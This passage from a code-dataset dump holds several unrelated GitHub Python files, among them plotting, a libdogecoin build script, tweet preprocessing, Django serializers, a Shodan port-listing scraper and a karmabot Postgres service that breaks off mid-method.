col=2)\n#------------------------------------------------------------------------------\n#fig.add_trace(go.Scatter(x=[20, 30, 40], y=[50, 60, 70]),\n# row=1, col=2)\n\n\n\n\np_x = 2\np_y = 2\n#fig.add_shape(go.layout.Shape(type=\"path\",path=\" M 1,1 L 3,1 L 2,2 Z\",fillcolor=RGB_bar[30]),line_color=RGB_bar[30], row=1, col=1)\n\n#fig.add_shape(go.layout.Shape(type=\"rect\",x0=p_x-0.25,y0=p_y-0.25,x1=p_x+0.25,y1=p_y+0.25,\n# line=dict(color='red'), fillcolor='red'), row=1, col=1 )\n\n\n\n\n#fig.add_trace(go.Scatter(x=[2],y=[2],text=[\"Unfilled Rectangle\"], mode=\"text\",orientation ='v',textposition=\"bottom center\",\n# textfont=dict(\n# family=\"sans serif\",\n# size=18,\n# color=\"LightSeaGreen\"\n# )), row=1, col=1)\n\n\nadd_polygon(fig,[4.3,2,3,4],[1,2.45,3,4],RGB_bar[60])\nadd_patch(fig,p_x,p_y,'red')\nadd_text(fig,'orlando',[5],[5],'black')\n\nfig.update_xaxes(range=[0, 10], showgrid=True,title_text=\"secondary yaxis title xaxis 1 title\", gridwidth=1, gridcolor='LightPink', row=1, col=1)\nfig.update_yaxes(range=[0, 10], showgrid=True,title_text=\"yaxis 1 title\", gridwidth=1, gridcolor='LightPink', row=1, col=1)\n#fig.update_yaxes(title_text=\"secondary yaxis title\", secondary_y=True)\n\n\n\n\nfig.show()","repo_name":"orlando68/Stanford","sub_path":"subplots.py","file_name":"subplots.py","file_ext":"py","file_size_in_byte":6371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11467163737","text":"from setuptools import setup, Extension, Command\nfrom Cython.Build import cythonize\nfrom Cython.Distutils import build_ext\n \nlibdoge_extension = [Extension(\n name= \"libdogecoin\",\n language= \"c\",\n sources= [\"wrappers/python/libdogecoin/libdogecoin.pyx\"],\n include_dirs= [\".\",\n \"include\",\n \"include/dogecoin\",\n \"secp256k1/include\"],\n libraries = [\"event\", \"event_core\", \"pthread\", \"m\"],\n extra_objects= [\".libs/libdogecoin.a\", \n \"src/secp256k1/.libs/libsecp256k1.a\", \n \"src/secp256k1/.libs/libsecp256k1_precomputed.a\"]\n)]\n\nsetup(\n name= \"libdogecoin\",\n version= \"0.1\", \n author= \"Jackie McAninch\",\n author_email= \"jackie.mcaninch.2019@gmail.com\",\n description= \"Python interface for the libdogecoin C library\",\n license= \"MIT\",\n url= \"https://github.com/dogecoinfoundation/libdogecoin\",\n cmdclass = {'build_ext': build_ext},\n ext_modules= cythonize(libdoge_extension, language_level = \"3\")\n)\n","repo_name":"michilumin/libdogecoin","sub_path":"wrappers/python/libdogecoin/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"17810538904","text":"import re\nimport os\nimport sys\nfrom textblob import TextBlob\nfrom nltk.corpus import stopwords\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom wordsegment import load, segment\nfrom autocorrect import Speller\n\nBASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(BASE_PATH+'/..')\n\nimport src.preprocessing.dictionaries as dictionaries\nimport src.paths as paths\n\nstopwords = set(stopwords.words('english'))\nspell = Speller(lang='en')\n\n# OTHER VALUES\nPOS_LABEL = '+1'\nNEG_LABEL = '-1'\n\n\ndef preprocess():\n \"\"\"\n Perform preprocessing on the positive, negative, and test tweet set, then concatenate into one tweet set.\n \"\"\"\n preprocess_pos()\n preprocess_neg()\n\n remove_indices_test()\n preprocess_test()\n\n # Concatenate the proprocessed versions of positive tweets and negative tweets into a new file\n concat_files([paths.POS_LABELS, paths.NEG_LABELS], paths.TRAIN)\n # Remove the tweets that appear >= 2 times and separate label from tweet.\n remove_both_duplicate_tweets(paths.TRAIN, paths.TRAIN_UNIQUE, paths.TRAIN_CONCAT_LABEL_UNIQUE)\n\n\ndef preprocess_pos():\n \"\"\"\n Perform preprocessing by removing duplicate tweets, preprocessings spaces, hashtags, contracted words, smileys\n and numbers on positive tweet set.\n \"\"\"\n print('Pre-processing positive tweets...')\n\n in_filename = remove_duplicate_tweets(paths.POS, paths.POS_UNIQUE)\n in_filename = spaces(in_filename, paths.POS_SPACES)\n in_filename = hashtags(in_filename, paths.POS_HASHTAGS)\n in_filename = contractions(in_filename, paths.POS_CONTRACT)\n in_filename = smileys(in_filename, paths.POS_SMILEYS)\n in_filename = numbers(in_filename, paths.POS_PREPROCESSED)\n in_filename = add_label(in_filename, paths.POS_LABELS, POS_LABEL)\n\n\ndef preprocess_neg():\n \"\"\"\n Perform preprocessing by removing duplicate tweets, preprocessings spaces, hashtags, contracted words, smileys\n and numbers on negative tweet set.\n \"\"\"\n print('Pre-processing negative tweets...')\n in_filename = remove_duplicate_tweets(paths.NEG, paths.NEG_UNIQUE)\n in_filename = spaces(in_filename, paths.NEG_SPACES)\n in_filename = hashtags(in_filename, paths.NEG_HASHTAGS)\n in_filename = contractions(in_filename, paths.NEG_CONTRACT)\n in_filename = smileys(in_filename, paths.NEG_SMILEYS)\n in_filename = numbers(in_filename, paths.NEG_PREPROCESSED)\n in_filename = add_label(in_filename, paths.NEG_LABELS, NEG_LABEL)\n\n\ndef preprocess_test():\n \"\"\"\n Perform preprocessing by removing duplicate tweets, preprocessings spaces, hashtags, contracted words, smileys\n and numbers on test set.\n \"\"\"\n print('Pre-processing the test set...')\n in_filename = spaces(paths.TEST_WITHOUT_INDICES, paths.TEST_SPACES)\n in_filename = hashtags(in_filename, paths.TEST_HASHTAGS)\n in_filename = contractions(in_filename, paths.TEST_CONTRACT)\n in_filename = smileys(in_filename, paths.TEST_SMILEYS)\n in_filename = numbers(in_filename, paths.TEST_PREPROCESSED)\n\n\ndef remove_indices_test():\n \"\"\"\n Remove the index label from the tweet in test set.\n \"\"\"\n test_file = open(paths.TEST, 'r')\n test_file_without_i = open(paths.TEST_WITHOUT_INDICES, 'w+')\n tweets_with_indices = [tweet for tweet in test_file]\n for i in range(len(tweets_with_indices)):\n size_to_remove = len(str(i+1))+1\n test_file_without_i.write(tweets_with_indices[i][size_to_remove:])\n test_file.close()\n test_file_without_i.close()\n\n\ndef remove_duplicate_tweets(tweets_path, out_file_path):\n \"\"\"\n Remove duplicated tweets given\n :param tweets_path: path to the file that contains tweets with duplicates\n :param out_file_path: path to the file that contains tweets without duplicates.\n :return: path to the file for the set of tweets without duplicates.\n \"\"\"\n print('\\tRemoving duplicate tweets...')\n lines_seen = set()\n outfile = open(out_file_path, \"w+\")\n for line in open(tweets_path, \"r\"):\n if line not in lines_seen:\n outfile.write(line)\n lines_seen.add(line)\n outfile.close()\n print('\\t\\tRemove duplicates ok.')\n return out_file_path\n\n\ndef remove_both_duplicate_tweets(tweets_path, out_filename, out_label_filename):\n \"\"\"\n Remove tweets that are in positive tweet set and negative tweet set.\n :param tweets_path: path to the file that contains positive and negative tweets\n :param out_filename: path to the file that contains tweets without duplicates\n :param out_label_filename: path to the file that contains labels to corresponding tweets in out_filename.\n \"\"\"\n print('Removing both duplicates...')\n line_to_occ = {}\n\n # Populate the dictionary with tweets and occurences\n for line in open(tweets_path, \"r\"):\n tweet = line[2:]\n label = line[:2]\n if tweet in line_to_occ:\n t = list(line_to_occ[tweet])\n t[0] += 1\n t = tuple(t)\n line_to_occ[tweet] = t\n else:\n line_to_occ[tweet] = (1, label)\n\n # Write the remaining tweets in the output file\n outfile = open(out_filename, \"w+\")\n out_label_file = open(out_label_filename, 'w+')\n for tweet in line_to_occ.keys():\n if line_to_occ[tweet][0] < 2:\n outfile.write(tweet)\n out_label_file.write((line_to_occ[tweet][1]))\n out_label_file.write('\\n')\n\n outfile.close()\n out_label_file.close()\n print('\\tRemove both ok.')\n\n\ndef spaces(tweets_path, out_filename):\n \"\"\"\n Preprocess spaces by replacing multiple spaces into single one.\n :param tweets_path: path to the file that contains tweets.\n :param out_filename: path to the file that contains tweets with processed spaces.\n :return: out_filename: path to the processed file.\n \"\"\"\n print('\\tHandling spaces...')\n outfile = open(out_filename, \"w+\")\n for tweet in open(tweets_path, \"r\"):\n outfile.write(re.sub(' +', ' ', tweet))\n outfile.close()\n print('\\t\\tSpaces ok.')\n return out_filename\n\n\ndef hashtags(tweets_path, out_filename):\n \"\"\"\n Segment expression followed by hashtags.\n :param tweets_path: path to the file that contains tweets.\n :param out_filename: path to the file that contains hashtag expressions preprocessed.\n :return: path to the file that contains hashtag expressions preprocessed.\n \"\"\"\n print('\\tHandling hashtags...')\n load()\n outfile = open(out_filename, \"w+\")\n for tweet in open(tweets_path, \"r\"):\n new_tweet = []\n list_of_words = tweet.split(' ')\n for i in range(len(list_of_words)):\n word = list_of_words[i]\n if word[0] == '#':\n for w in segment(word[1:]):\n new_tweet.append(w)\n if i == len(list_of_words) - 1:\n new_tweet.append('\\n')\n else:\n new_tweet.append(word)\n tweet_str = []\n for i in range(len(new_tweet)):\n tweet_str.append(str(new_tweet[i]))\n if i != len(new_tweet) - 1:\n tweet_str.append(' ')\n outfile.write(''.join(tweet_str))\n outfile.close()\n print('\\t\\tHashtags ok.')\n return out_filename\n\n\ndef autocorrect(tweets_path, out_filename):\n \"\"\"\n Autocorrect words in the given tweet set\n :param tweets_path: path to the file that contains the tweet set\n :param out_filename: path to the file that contains tweets with autcorrected words.\n :return: path to the file that contains tweets with autcorrected words.\n \"\"\"\n print('\\tAuto-correcting tweets...')\n outfile = open(out_filename, \"w+\")\n for tweet in open(tweets_path, \"r\"):\n outfile.write(' '.join([spell(w) for w in tweet.split()]))\n outfile.close()\n print('\\t\\tAuto-correct ok.')\n return out_filename\n\n\ndef contractions(tweets_path, out_filename):\n \"\"\"\n Handle contracted expression by replacing them into their expanded version.\n :param tweets_path: path to the file that contains the tweet set\n :param out_filename: path to the file that contains tweets with expanded contractions.\n :return: path to the file that contains tweets with expanded contractions.\n \"\"\"\n print('\\tHandling contractions...')\n outfile = open(out_filename, \"w+\")\n contractions = dictionaries.load_dict_contractions()\n for tweet in open(tweets_path, \"r\"):\n tweet_list = tweet.split()\n tweet_list_new = []\n for word in tweet_list:\n if word in contractions.keys():\n tweet_list_new.append(contractions[word])\n else:\n tweet_list_new.append(word)\n outfile.write(' '.join(tweet_list_new))\n outfile.write('\\n')\n outfile.close()\n print('\\t\\tContractions ok.')\n return out_filename\n\n\ndef smileys(tweets_path, out_filename):\n \"\"\"\n Change any smiley into \"smiley\".\n :param tweets_path: path to the file that contains the tweet set with smileys.\n :param out_filename:\n :return:\n \"\"\"\n print('\\tHandling smileys...')\n outfile = open(out_filename, \"w+\")\n smileys = dictionaries.load_dict_smileys()\n for tweet in open(tweets_path, \"r\"):\n tweet_list = tweet.split()\n tweet_list_new = []\n for word in tweet_list:\n if word in smileys.keys():\n tweet_list_new.append(smileys[word])\n else:\n tweet_list_new.append(word)\n outfile.write(' '.join(tweet_list_new))\n outfile.write('\\n')\n outfile.close()\n print('\\t\\tSmileys ok.')\n return out_filename\n\n\ndef numbers(tweets_path, out_filename):\n \"\"\"\n Change any numbers into \n :param tweets_path: path to the file that contains the tweet set.\n :param out_filename: path to the file with any numbers replaced by \n :return: path to the file with tweets where any numbers replaced by \n \"\"\"\n print('\\tHandling numbers...')\n outfile = open(out_filename, \"w+\")\n for tweet in open(tweets_path, \"r\"):\n outfile.write(re.sub('[-+]?\\d*\\.\\d+|\\d+', '', tweet))\n outfile.close()\n print('\\t\\tNumbers ok.')\n return out_filename\n\n\ndef remove_hooks(tweets_path, out_filename):\n \"\"\"\n Remove hooks.\n :param tweets_path: path to the file that contains the tweet set.\n :param out_filename: path to the file with tweets where hooks are removed.\n :return:\n \"\"\"\n print('\\tRemoving hooks...')\n outfile = open(out_filename, \"w+\")\n for tweet in open(tweets_path, \"r\"):\n outfile.write(re.sub(' *<.*?> *', '', tweet))\n outfile.close()\n print('\\t\\tHooks ok.')\n return out_filename\n\n\ndef punctuation(tweets_path, out_filename):\n \"\"\"\n Remove any punctuations such as !,?,-,.,...\n :param tweets_path: path to the file that contains the tweet set.\n :param out_filename: path to the file that contains tweets without punctuation.\n :return: path to the file that contains tweets without punctuation.\n \"\"\"\n print('\\tHandling punctuation...')\n outfile = open(out_filename, \"w+\")\n for tweet in open(tweets_path, \"r\"):\n tweet_blob = TextBlob(tweet)\n outfile.write(' '.join(tweet_blob.words))\n outfile.write('\\n')\n outfile.close()\n print('\\t\\tPunctuation ok.')\n return out_filename\n\n\n# TODO: CHANGE THIS, stopwords contain negative words\ndef stopw(tweets_path, out_filename):\n \"\"\"\n Remove words that are considered as stopwords by NLTK library.\n :param tweets_path: path to the file that contains the tweet set.\n :param out_filename: path to the file that contains the tweet set without stopwords.\n :return: path to the file that contains the tweet set without stopwords.\n \"\"\"\n outfile = open(out_filename, \"w+\")\n for tweet in open(tweets_path, \"r\"):\n tweet_list = tweet.split()\n clean_tokens = [t for t in tweet_list if re.match(r'[^\\W\\d]*$', t)]\n clean_s = ' '.join(clean_tokens)\n clean_mess = [word for word in clean_s.split() if word.lower() not in stopwords]\n outfile.write(' '.join(clean_mess))\n outfile.write('\\n')\n outfile.close()\n print('\\t\\tStopwords ok.')\n return out_filename\n\n\ndef normalization(tweets_path, out_filename):\n \"\"\"\n Normalise given tweet set.\n :param tweets_path: path to the file that contains tweet set.\n :param out_filename: path to the file that contains normalized tweet set.\n :return:\n \"\"\"\n outfile = open(out_filename, \"w+\")\n for tweet in open(tweets_path, \"r\"):\n lem = WordNetLemmatizer()\n normalized_tweet = []\n tweet_list = tweet.split()\n for word in tweet_list:\n normalized_text = lem.lemmatize(word, 'v')\n normalized_tweet.append(normalized_text)\n outfile.write(' '.join(normalized_tweet))\n outfile.write('\\n')\n outfile.close()\n print('\\t\\tNormalization ok.')\n return out_filename\n\n\ndef add_label(tweets_path, out_filename, label_value):\n \"\"\"\n Add label value next to each tweet in given tweet set.\n :param in_filename: path to the file that contains the tweet set\n :param out_filename: path to the file that contains the tweets set to which a label is added.\n :param label_value: Corresponding label value the to tweet set.\n :return: path to the file that contains the tweets set to which a label is added.\n \"\"\"\n outfile = open(out_filename, 'w+')\n for line in open(tweets_path, 'r'):\n outfile.write(label_value)\n outfile.write(line)\n outfile.close()\n return out_filename\n\n\ndef concat_files(in_filenames, out_filename):\n \"\"\"\n Concat both positive tweet set and negative tweet set.\n :param in_filenames: paths to the files that need to be merged\n :param out_filename: path to the file that merged two tweet sets\n \"\"\"\n print('Concatenating positive and negative files...')\n with open(out_filename, 'w+') as outfile:\n for filename in in_filenames:\n with open(filename) as infile:\n for line in infile:\n outfile.write(line)\n print('\\tConcatenation ok.')\n\n\nif __name__ == '__main__':\n preprocess()","repo_name":"rayandaod/Twitter-sentiment-analysis","sub_path":"src/preprocessing/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":14121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74006554611","text":"from django.db import transaction\nfrom drf_base64.fields import Base64ImageField\nfrom rest_framework import serializers\n\nfrom guides.fields.foldfilefield import FoldFileField\nfrom guides.fold import Fold\nfrom guides.models import Guide\nfrom guides.tasks import process_guide\n\n\nclass GuideReadSerializer(serializers.ModelSerializer):\n solved = serializers.SerializerMethodField()\n liked = serializers.SerializerMethodField()\n owner_username = serializers.CharField(source='owner.username', required=False)\n\n class Meta:\n model = Guide\n read_only_fields = [\n 'owner',\n 'published_at',\n 'animation_file',\n 'steps',\n 'status',\n 'owner_username',\n ]\n fields = [\n 'id',\n 'owner',\n 'name',\n 'published_at',\n 'steps',\n 'guide_file',\n 'thumbnail_file',\n 'animation_file',\n 'status',\n 'private',\n 'solved',\n 'liked',\n 'owner_username',\n ]\n\n def get_solved(self, obj):\n user = self.context['request'].user\n return obj.solved_by.filter(id=user.id).exists()\n\n def get_liked(self, obj):\n user = self.context['request'].user\n return obj.liked_by.filter(id=user.id).exists()\n\n\nclass GuideWriteSerializer(GuideReadSerializer):\n guide_file = FoldFileField()\n name = serializers.CharField(required=False)\n thumbnail_file = Base64ImageField(required=False)\n\n @transaction.atomic\n def create(self, validated_data):\n fold = Fold.from_fold_file(validated_data['guide_file'])\n guide = Guide.objects.create(**validated_data, name=fold.title, steps=fold.steps)\n transaction.on_commit(lambda: process_guide.delay(guide.pk))\n return guide\n\n @transaction.atomic\n def update(self, instance, validated_data):\n if validated_data.get('guide_file') is not None:\n fold = Fold.from_fold_file(validated_data['guide_file'])\n validated_data['name'] = fold.title\n validated_data['steps'] = fold.steps\n transaction.on_commit(lambda: process_guide.delay(instance.pk))\n\n return super(GuideWriteSerializer, self).update(instance, validated_data)\n","repo_name":"maciekmm/origami","sub_path":"backend/community/guides/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37219434971","text":"class Solution:\n def eliminateMaximum(self, dist: 'List[int]', speed: 'List[int]') -> int:\n ceiling = lambda x : int(x) + (1 if int(x)!=x else 0)\n arrive = sorted([ceiling(a/b) for a, b in zip(dist, speed)])\n time = 0\n while arrive: #keep shooting every minute, until the monster arrives, and it cannot be eliminate before current time.\n if time < arrive[0]:\n time+=1\n arrive.pop(0)\n else:\n return len(dist) - len(arrive) #total - left = eliminated\n return len(dist)\n\n","repo_name":"renjieliu/leetcode","sub_path":"1500_1999/1921.py","file_name":"1921.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"6745449775","text":"from django.contrib import admin\nfrom django.urls import path, include # new\nfrom ser import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('accounts/', include('django.contrib.auth.urls')), # new\n path('req/',views.req,name=\"req \"),\n path('shop/',views.shop,name=\"shop \"),\n path('email/',views.serv_mail,name=\"email\"),\n path('list/',views.MyView,name=\"list\"),\n path('show/',views.Myreqview,name=\"show\"),\n path('gmail/',views.shopmail,name=\"gmail\"),\n path('',include('signin.urls')),\n path('',include('blog.urls')),\n \n]","repo_name":"alwinarakkal/firstv1","sub_path":"pro/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34599442137","text":"from colours import *\nimport simplejson as json\nimport os, shutil\n\ndef writefile(fname,data,confdir=\"/etc/cluster.conf\",type=\"json\"):\n #Escribir archivos de configuracion en el directorio /etc/cluster.conf\n #Validar que exista si no crearlo\n if not os.path.exists(confdir):\n warning_msg(\"Creating conf directory: \" + confdir)\n os.makedirs(confdir)\n pathfile = confdir + \"/\" + fname\n if os.path.exists(pathfile):\n warning_msg(\"Making backup of: \" + pathfile)\n shutil.move(pathfile,pathfile + '.old')\n file_conf = open(pathfile,'w')\n printout(\"Writing \" + type + \" file: \" + pathfile, GREEN)\n if type == \"json\":\n file_conf.write(json.dumps(data, sort_keys=True, indent=2))\n if type == \"conf\":\n file_conf.write(data)\n if type == \"pxe\":\n file_conf.write(data)\n file_conf.close()\n\ndef header_msg(msg):\n printout(\"++++++++++++++++++++++++++++++++++++++++++++\",CYAN)\n printout(msg,BLUE)\n printout(\"++++++++++++++++++++++++++++++++++++++++++++\",CYAN)\n\ndef footer_msg():\n #printout(\"--------------------------------------------\\n\",CYAN)\n print\n\ndef warning_msg(msg=\"\"):\n printout(\"WARNNING: \" + msg,WHITE)\n\ndef error_msg(msg=\"\"):\n printout(msg,RED)\n sys.exit()\n\ndef critical_data_check(d, msg):\n if not d:\n printout(msg,RED)\n sys.exit()\n\ndef insert_dict(cur, list, value):\n if len(list) == 1:\n cur[list[0]] = value\n return\n if not cur.has_key(list[0]):\n cur[list[0]] = {}\n insert_dict(cur[list[0]], list[1:], value)\n","repo_name":"Lufac/pycia","sub_path":"src/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36837500618","text":"inp = input(\"Enter the string : \")\r\nstring = \"\"\r\nfor i in range(0,len(inp)):\r\n if i+1 < len(inp) and inp[i]==')' and inp[i+1] == '(' :\r\n string = string + inp[i] + \"*\"\r\n else:\r\n string += inp[i]\r\nalpha = ['a','b','c','d','e','temp_res']\r\noper = ['+','-','*','/']\r\nstack = []\r\nstatus = True\r\nfor char in string:\r\n if char in ['(']:\r\n stack.append(char)\r\n elif char in alpha:\r\n stack.append(char)\r\n elif char in oper:\r\n stack.append(char)\r\n elif char == ')':\r\n if '(' in stack:\r\n b = stack.pop()\r\n op = stack.pop()\r\n a = stack.pop()\r\n if a not in alpha or b not in alpha or op not in oper:\r\n status = False\r\n break\r\n stack.pop()\r\n stack.append('temp_res')\r\n else:\r\n status = False\r\n break\r\n \r\nif len(stack)== 1 and stack[0] == 'temp_res' :\r\n stack.pop()\r\nelif len(stack)== 3 and stack[0] == 'temp_res' and stack[2] == 'temp_res' and stack[1] in oper :\r\n stack = []\r\n\r\nif stack ==[] and status == True :\r\n print('Valid!!!')\r\nelse:\r\n print('Invalid!!!')\r\n \r\n \r\n \r\n\r\n","repo_name":"Harikrishnancse/ZOHO-Interview-Questions-Programs-Python","sub_path":"expression checker.py","file_name":"expression checker.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71002099254","text":"# coding: utf8\n\"\"\"@package business.third_party_pay.jinge_card_resource\n表示已分配的锦歌饭卡资源\n\n\"\"\"\n\nfrom business import model as business_model\n\n\nclass JinGeCardResource(business_model.Resource):\n\t\"\"\"\n\t已分配的锦歌饭卡资源\n\t\"\"\"\n\t__slots__ = (\n\t\t'type',\n\t\t'trade_id',\n\t\t'order_id',\n\t\t'money'\n\t)\n\n\tdef __init__(self, type, order_id, trade_id, money):\n\t\tbusiness_model.Resource.__init__(self)\n\t\tself.order_id = order_id\n\t\tself.trade_id = trade_id\n\t\tself.type = type\n\t\tself.money = money\n\n\tdef get_type(self):\n\t\treturn self.type\n","repo_name":"chengdg/apiserver","sub_path":"business/third_party_pay/jinge_card_resource.py","file_name":"jinge_card_resource.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73996470771","text":"import requests\nimport re\nimport time\nimport IPy\nimport sys\nclass shodan:\n def __init__(self):\n self.url = \"https://www.shodan.io/host/\"\n\n def _get_html(self,url):\n try:\n req = requests.get(url,timeout=10)\n code = req.status_code\n except Exception as e:\n print(\"Err:%s\" % e)\n code = 404\n if code == 200:\n html = req.text\n else:\n html = ''\n return html.strip()\n\n def get_port(self,ip):\n html = self._get_html(self.url+str(ip))\n li_list = re.findall(r\"
  • (.*?)<\\/li>\",html,re.S)\n for li in li_list:\n re_port = re.search(r\"
    (.*?)<\\/div>\",li)\n re_protocol = re.search(r\"
    (.*?)<\\/div>\",li)\n re_state = re.search(r\"
    (.*?)<\\/div>\",li)\n re_server = re.search(r\"

    (.*?)<\\/small><\\/h3>\",li)\n port = re_port.group(1) if re_port else ''\n state = re_state.group(1) if re_state else ''\n server = re_server.group(1).replace(\"\",\"\t\") if re_server else ''\n print(ip,port,state,server)\ns=shodan()\nips = IPy.IP(sys.argv[1])\nfor ip in ips:\n print(ip)\n s.get_port(ip)\n\n","repo_name":"githubmaidou/tools","sub_path":"shodan.py","file_name":"shodan.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":295,"dataset":"github-code","pt":"21"} +{"seq_id":"5424186337","text":"#!/usr/bin/python3\nimport requests\nimport sys\n\nif __name__ == \"__main__\":\n url = \"https://swapi.co/api/people/?search=\" + sys.argv[1]\n r = requests.get(url)\n j = r.json()\n print('Number of results: {}'.format(j.get('count')))\n results = j.get('results')\n for result in results:\n print(result.get('name'))\n","repo_name":"FreeJules/holbertonschool-webstack_basics","sub_path":"0x03-python_web_scraping/5-starwars.py","file_name":"5-starwars.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30528097458","text":"\"\"\"Manages class for telegram service.\n\"\"\"\nfrom typing import List, Tuple, Optional, Dict\nfrom dataclasses import dataclass\nimport psycopg2\nfrom .models import User, Telegram_Chat, Telegram_Message, User_in_Chat\nimport logging\n\nclass InvalidDBConfig(Exception):\n pass\n\nclass UserNotFound(Exception):\n \"\"\"Returned when no valid user is found\"\"\"\n pass\n\n@dataclass\nclass PostgresDBConfig:\n \"\"\"Information to connect to postgres\"\"\"\n host: str\n database: str\n user: str\n password: str\n\n\nclass KarmabotDatabaseService:\n \"\"\"Base class for karmabot service\"\"\"\n #TODO: make sure all my methods have docstrings\n def get_karma_for_users_in_chat(self, chat_id: str) -> List[Tuple[str, str, int]]:\n \"\"\"Gets karma for user in chat\"\"\"\n raise NotImplementedError\n\n #TODO: determine if this should be on public api\n # def get_user_by_username(self, username: str) -> User:\n # raise NotImplementedError\n #TODO: don't return optional\n def get_random_witty_response(self) -> Optional[str]:\n raise NotImplementedError\n\n def save_or_create_user(self, user: User) -> User:\n raise NotImplementedError\n\n def save_or_create_chat(self, chat: Telegram_Chat) -> Telegram_Chat:\n raise NotImplementedError\n\n def user_reply_to_message(self,\n reply_from_user_unsaved: User,\n reply_to_user_unsaved: User,\n chat: Telegram_Chat,\n original_message: Telegram_Message,\n reply_message: Telegram_Message,\n karma: int):\n raise NotImplementedError\n\n def get_user_stats(self, username: str, chat_id: str) -> Dict:\n raise NotImplementedError\n\n def get_chat_info(self, chat_id: str) -> Dict:\n raise NotImplementedError\n\n def get_chat_name(self, chat_id: str) -> Optional[str]:\n raise NotImplementedError\n # TODO: give option for using day/week as well as start/end date\n\n def get_responses_per_day(self, chat_id: str) -> Optional[Tuple[str, str]]:\n \"\"\"Returns responses per day per chat\"\"\"\n raise NotImplementedError\n\n #TODO: throw exception if chat is not with bot\n def clear_chat_with_bot(self, chat_id, user_id):\n \"\"\"Clears all history from a chat but only if chat_id matches user_id\n If chat_id matches user_id then the chat is a 1 on 1 with a bot.\"\"\"\n raise NotImplementedError\n\n def get_chats_user_is_in(self, user_id: int) -> Optional[List[Tuple[str, str]]]:\n raise NotImplementedError\n\n def use_command(self, command: str, user: User, chat_id: str):\n raise NotImplementedError\n\n\nclass PostgresKarmabotDatabaseService(KarmabotDatabaseService):\n \"\"\"Does connections to postgres\"\"\"\n #TODO: trigger use_commmand on function invocations (perhaps add annotation?)\n def __init__(self, db_config: PostgresDBConfig) -> None:\n try:\n self.conn = psycopg2.connect(\n host=db_config.host,\n database=db_config.database,\n user=db_config.user,\n password=db_config.password)\n except psycopg2.OperationalError as oe:\n raise oe\n\n def get_karma_for_users_in_chat(self,\n chat_id: str) -> List[Tuple[str, str, int]]:\n \"\"\"Returns username, firstname, karma for all telegram users in a given chat\"\"\"\n cmd = \"\"\"select username, first_name, karma from telegram_user tu\n LEFT JOIN user_in_chat uic ON uic.user_id=tu.user_id\n where uic.chat_id=%s;\"\"\"\n with self.conn:\n with self.conn.cursor() as crs:\n # TODO: handle | psycopg2.ProgrammingError: relation \"user_in_chat\"\n # does not exist\n crs.execute(cmd, [chat_id])\n return crs.fetchall()\n\n def get_user_by_username(self, username: str) -> User:\n \"\"\"Returns User given that user's username\"\"\"\n with self.conn:\n with self.conn.cursor() as crs: # I would love type hints here but psycopg2.cursor isn't a defined class\n selectcmd = \"SELECT user_id, username, first_name, last_name from telegram_user tu where tu.username=%s\"\n crs.execute(selectcmd, [username])\n res = crs.fetchone()\n return User(res[0], res[1], res[2], res[3])\n\n\n def get_random_witty_response(self)-> Optional[str]:\n \"\"\"Returns a random witty response. Uses USER_FIRST_NAME as replace string for actual user first name\"\"\"\n cmd = \"\"\"SELECT response FROM attempted_self_plus_one_response ORDER BY RANDOM() LIMIT 1\"\"\"\n\n with self.conn:\n with self.conn.cursor() as crs:\n crs.execute(cmd, [])\n result = crs.fetchone()\n if result is not None:\n return result[0]\n else:\n return None\n\n def save_or_create_user(self, user: User) -> User:\n \"\"\"Creates a user in database if not exists, otherwise update values and return the new database copy of the User\"\"\"\n with self.conn:\n with self.conn.cursor() as crs: # I would love type hints here but psycopg2.cursor isn't a defined class\n selectcmd = \"SELECT user_id, username, first_name, last_name from telegram_user tu where tu.user_id=%s\"\n # TODO: upsert to update values otherwise username, firstname, lastname wont ever change\n # print(\"user with id: \" + str(user_id) + \" not found: creating user\")\n insertcmd = \"\"\"INSERT into telegram_user\n (user_id, username, first_name, last_name) VALUES (%s,%s,%s,%s)\n ON CONFLICT (user_id) DO UPDATE\n SET username = EXCLUDED.username,\n first_name = EXCLUDED.first_name,\n last_name = EXCLUDED.last_name\n \"\"\"\n crs.execute(insertcmd,\n [user.get_user_id(),\n user.get_username(),\n user.get_first_name(),\n user.get_last_name()])\n self.conn.commit()\n crs.execute(selectcmd, [user.get_user_id()])\n (user_id, username, first_name, last_name) = crs.fetchone()\n return User(user_id, username, first_name, last_name)\n\n def save_or_create_chat(self, chat: Telegram_Chat):\n \"\"\"Creates chat if not exists otherwise updates chat_name\"\"\"\n with self.conn:\n with self.conn.cursor() as crs: # I would love type hints here but psycopg2.cursor isn't a defined class\n insertcmd = \"\"\"INSERT into telegram_chat\n (chat_id, chat_name) VALUES (%s,%s)\n ON CONFLICT (chat_id) DO UPDATE\n SET chat_name = EXCLUDED.chat_name\"\"\"\n crs.execute(insertcmd, [chat.chat_id, chat.chat_name])\n self.conn.commit()\n\n def 